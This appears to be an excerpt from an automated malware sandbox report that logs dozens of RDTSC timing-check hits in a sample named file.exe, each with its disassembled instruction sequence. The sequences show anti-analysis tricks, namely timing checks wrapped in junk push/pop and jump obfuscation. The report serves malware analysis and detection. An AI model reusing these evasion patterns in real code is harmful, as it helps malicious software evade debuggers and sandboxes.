Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: DC603D second address: DC6042 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC6042 second address: DC6048 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC6048 second address: DC605A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jo 00007F66B1272F5Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC605A second address: DC605E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC605E second address: DC6063 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC614A second address: DC6150 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC6150 second address: DC6156 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC6300 second address: DC6305 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC6305 second address: DC630B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC630B second address: DC6343 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 sub dword ptr [ebp+122D1814h], eax 0x0000000e push 00000000h 0x00000010 pushad 0x00000011 jnl 00007F66B07B4FBBh 0x00000017 popad 0x00000018 push 44009523h 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 push ebx 0x00000022 pop ebx 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC6343 second address: DC6349 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC6349 second address: DC634F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC634F second address: DC63A9 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F66B1272F56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xor dword ptr [esp], 440095A3h 0x00000013 mov di, 9FD8h 0x00000017 push 00000003h 0x00000019 je 00007F66B1272F6Fh 0x0000001f jmp 00007F66B1272F69h 0x00000024 mov dword ptr [ebp+122D1898h], ecx 0x0000002a push 00000000h 0x0000002c push 00000003h 0x0000002e mov edi, esi 0x00000030 push 801ED96Ah 0x00000035 pushad 0x00000036 jnp 00007F66B1272F58h 0x0000003c push eax 0x0000003d push edx 0x0000003e ja 00007F66B1272F56h 0x00000044 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC63A9 second address: DC63AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC63AD second address: DC63D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xor dword ptr [esp], 401ED96Ah 0x0000000e mov dword ptr [ebp+122D2FA0h], edi 0x00000014 lea ebx, dword ptr [ebp+12457D69h] 0x0000001a add di, 7F09h 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DC63D2 second address: DC63D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB1720 second address: DB1726 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE65CE second address: DE65E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jl 00007F66B07B4FA6h 0x0000000f push edi 0x00000010 pop edi 0x00000011 jbe 00007F66B07B4FA6h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE688B second address: DE68B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F66B1272F66h 0x0000000b jo 00007F66B1272F56h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jl 00007F66B1272F56h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE68B6 second address: DE68C0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE68C0 second address: DE68C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE68C6 second address: DE68CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE68CA second address: DE68E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a jmp 00007F66B1272F5Dh 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 pop edi 0x00000012 push eax 0x00000013 push edx 0x00000014 push edi 0x00000015 pop edi 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE68E8 second address: DE68F2 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F66B07B4FA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE68F2 second address: DE68FB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE6A84 second address: DE6A8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE6A8C second address: DE6A90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE7181 second address: DE7185 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE7185 second address: DE71B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66B1272F64h 0x00000007 jne 00007F66B1272F56h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F66B1272F5Fh 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE7444 second address: DE7448 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE7448 second address: DE744C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE744C second address: DE7452 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE7452 second address: DE7457 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDE574 second address: DDE5A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F66B07B4FB6h 0x00000009 popad 0x0000000a jne 00007F66B07B4FAEh 0x00000010 pushad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDE5A1 second address: DDE5A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDE5A7 second address: DDE5AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDE5AD second address: DDE5C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F66B1272F60h 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDE5C5 second address: DDE5F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 jmp 00007F66B07B4FAFh 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 jmp 00007F66B07B4FB5h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE7755 second address: DE777F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F66B1272F5Ch 0x0000000a pop ebx 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F66B1272F66h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE777F second address: DE7783 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE7E7E second address: DE7E84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE7E84 second address: DE7EA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F66B07B4FB9h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE7FE0 second address: DE801E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jc 00007F66B1272F56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ebx 0x0000000d pushad 0x0000000e pushad 0x0000000f js 00007F66B1272F56h 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 popad 0x00000018 push edi 0x00000019 pushad 0x0000001a popad 0x0000001b jmp 00007F66B1272F66h 0x00000020 pop edi 0x00000021 push ebx 0x00000022 ja 00007F66B1272F56h 0x00000028 pop ebx 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DE801E second address: DE8022 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DDE599 second address: DDE5A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DEE47D second address: DEE490 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F66B07B4FAAh 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAC4E2 second address: DAC504 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F66B1272F56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b jmp 00007F66B1272F65h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAC504 second address: DAC511 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 js 00007F66B07B4FA6h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAC511 second address: DAC53C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66B1272F5Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c jmp 00007F66B1272F63h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF3211 second address: DF321E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF338C second address: DF339C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F66B1272F5Ah 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF339C second address: DF33BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jmp 00007F66B07B4FB7h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF33BC second address: DF33F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66B1272F69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F66B1272F5Fh 0x0000000e pushad 0x0000000f jbe 00007F66B1272F56h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF3A31 second address: DF3A3F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 push edi 0x0000000a pop edi 0x0000000b push edx 0x0000000c pop edx 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF3A3F second address: DF3A44 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF5B43 second address: DF5BD6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66B07B4FB1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 75531642h 0x00000010 push 00000000h 0x00000012 push edi 0x00000013 call 00007F66B07B4FA8h 0x00000018 pop edi 0x00000019 mov dword ptr [esp+04h], edi 0x0000001d add dword ptr [esp+04h], 00000016h 0x00000025 inc edi 0x00000026 push edi 0x00000027 ret 0x00000028 pop edi 0x00000029 ret 0x0000002a or esi, dword ptr [ebp+122D30E8h] 0x00000030 call 00007F66B07B4FA9h 0x00000035 jng 00007F66B07B4FBDh 0x0000003b push eax 0x0000003c jmp 00007F66B07B4FAEh 0x00000041 mov eax, dword ptr [esp+04h] 0x00000045 push eax 0x00000046 pushad 0x00000047 jmp 00007F66B07B4FB6h 0x0000004c push eax 0x0000004d push edx 0x0000004e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF5BD6 second address: DF5BF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 push edi 0x00000009 push eax 0x0000000a pushad 0x0000000b popad 0x0000000c pop eax 0x0000000d pop edi 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jnl 00007F66B1272F58h 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF5EAE second address: DF5EBA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF6039 second address: DF603E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF67FB second address: DF6801 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF6801 second address: DF6838 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jmp 00007F66B1272F64h 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jl 00007F66B1272F68h 0x00000016 jmp 00007F66B1272F62h 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF6A13 second address: DF6A20 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF72E6 second address: DF72EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF72EA second address: DF72F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF7D0B second address: DF7D11 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF7D11 second address: DF7D1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F66B07B4FA6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF7D1B second address: DF7D1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF7D1F second address: DF7D3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jne 00007F66B07B4FB5h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF7D3F second address: DF7DCB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66B1272F5Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov esi, dword ptr [ebp+122D2A9Ah] 0x00000010 mov dword ptr [ebp+122D1FB1h], ebx 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push edx 0x0000001b call 00007F66B1272F58h 0x00000020 pop edx 0x00000021 mov dword ptr [esp+04h], edx 0x00000025 add dword ptr [esp+04h], 0000001Ch 0x0000002d inc edx 0x0000002e push edx 0x0000002f ret 0x00000030 pop edx 0x00000031 ret 0x00000032 mov si, 0C27h 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push ebp 0x0000003b call 00007F66B1272F58h 0x00000040 pop ebp 0x00000041 mov dword ptr [esp+04h], ebp 0x00000045 add dword ptr [esp+04h], 00000017h 0x0000004d inc ebp 0x0000004e push ebp 0x0000004f ret 0x00000050 pop ebp 0x00000051 ret 0x00000052 ja 00007F66B1272F5Ah 0x00000058 xchg eax, ebx 0x00000059 push ebx 0x0000005a jg 00007F66B1272F60h 0x00000060 pop ebx 0x00000061 push eax 0x00000062 push eax 0x00000063 push edx 0x00000064 push eax 0x00000065 pushad 0x00000066 popad 0x00000067 pop eax 0x00000068 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF99F7 second address: DF99FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF97A7 second address: DF97ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66B1272F5Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F66B1272F64h 0x0000000f je 00007F66B1272F56h 0x00000015 popad 0x00000016 popad 0x00000017 push eax 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F66B1272F63h 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFA47C second address: DFA4F3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F66B07B4FA8h 0x0000000c push edi 0x0000000d pop edi 0x0000000e popad 0x0000000f push eax 0x00000010 pushad 0x00000011 jmp 00007F66B07B4FB3h 0x00000016 jl 00007F66B07B4FA8h 0x0000001c popad 0x0000001d nop 0x0000001e mov esi, 2F11AC60h 0x00000023 push eax 0x00000024 jmp 00007F66B07B4FB6h 0x00000029 pop esi 0x0000002a push 00000000h 0x0000002c jmp 00007F66B07B4FACh 0x00000031 mov dword ptr [ebp+122D2F09h], ecx 0x00000037 push 00000000h 0x00000039 adc si, 938Eh 0x0000003e mov dword ptr [ebp+1246AE0Bh], ecx 0x00000044 push eax 0x00000045 push eax 0x00000046 push edx 0x00000047 jnl 00007F66B07B4FA8h 0x0000004d push ebx 0x0000004e pop ebx 0x0000004f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFBB04 second address: DFBB6D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push edi 0x0000000b call 00007F66B1272F58h 0x00000010 pop edi 0x00000011 mov dword ptr [esp+04h], edi 0x00000015 add dword ptr [esp+04h], 00000017h 0x0000001d inc edi 0x0000001e push edi 0x0000001f ret 0x00000020 pop edi 0x00000021 ret 0x00000022 push 00000000h 0x00000024 mov edi, 42A67AA7h 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push eax 0x0000002e call 00007F66B1272F58h 0x00000033 pop eax 0x00000034 mov dword ptr [esp+04h], eax 0x00000038 add dword ptr [esp+04h], 0000001Ah 0x00000040 inc eax 0x00000041 push eax 0x00000042 ret 0x00000043 pop eax 0x00000044 ret 0x00000045 mov si, A5DCh 0x00000049 xchg eax, ebx 0x0000004a pushad 0x0000004b jnp 00007F66B1272F58h 0x00000051 pushad 0x00000052 jg 00007F66B1272F56h 0x00000058 push eax 0x00000059 push edx 0x0000005a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFDFE6 second address: DFDFEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFDFEA second address: DFDFEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFDFEE second address: DFDFF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFF06F second address: DFF073 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFF073 second address: DFF08C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66B07B4FAEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DFF08C second address: DFF091 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3926E second address: E3928D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66B07B4FB1h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jno 00007F66B07B4FA6h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3928D second address: E392A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66B1272F62h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3F02F second address: E3F053 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F66B07B4FB4h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b ja 00007F66B07B4FAAh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3F053 second address: E3F058 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3F058 second address: E3F05E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF4498 second address: DDE574 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F66B1272F56h 0x0000000a popad 0x0000000b nop 0x0000000c mov dword ptr [ebp+122D1CF0h], edx 0x00000012 call dword ptr [ebp+122D1822h] 0x00000018 jnp 00007F66B1272F82h 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
